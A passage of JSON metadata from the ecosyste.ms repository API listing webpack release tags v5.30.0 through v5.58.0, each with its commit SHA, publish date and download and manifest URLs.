ack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha"